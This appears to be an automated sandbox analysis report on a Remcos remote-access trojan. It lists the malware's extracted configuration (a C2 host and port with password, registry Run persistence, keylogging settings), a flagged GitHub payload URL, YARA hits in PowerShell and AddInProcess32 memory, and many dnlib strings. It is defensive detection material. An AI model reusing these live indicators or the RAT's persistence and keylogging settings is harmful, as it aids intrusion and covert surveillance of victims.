Malware Configuration Extractor: Remcos {"Host:Port:Password": "ab9001.ddns.net:55543:1", "Assigned name": "OCT", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "vlc.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "chrorne-9OH0YR", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for domain / URL

Source: ab9001.ddns.net	Virustotal: Detection: 15%	Perma Link
Source: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt	Virustotal: Detection: 6%	Perma Link
Source: ab9001.ddns.net	Virustotal: Detection: 15%	Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 8.2.powershell.exe.1b057622410.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.1b057622410.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2646574192.000000000262E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1575148283.000001B0571DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7444, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

11_2_004315EC

Source: powershell.exe, 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_67aae967-1

Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49708 version: TLS 1.2

Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.1625573790.00007FF886E80000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.1625573790.00007FF886E80000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
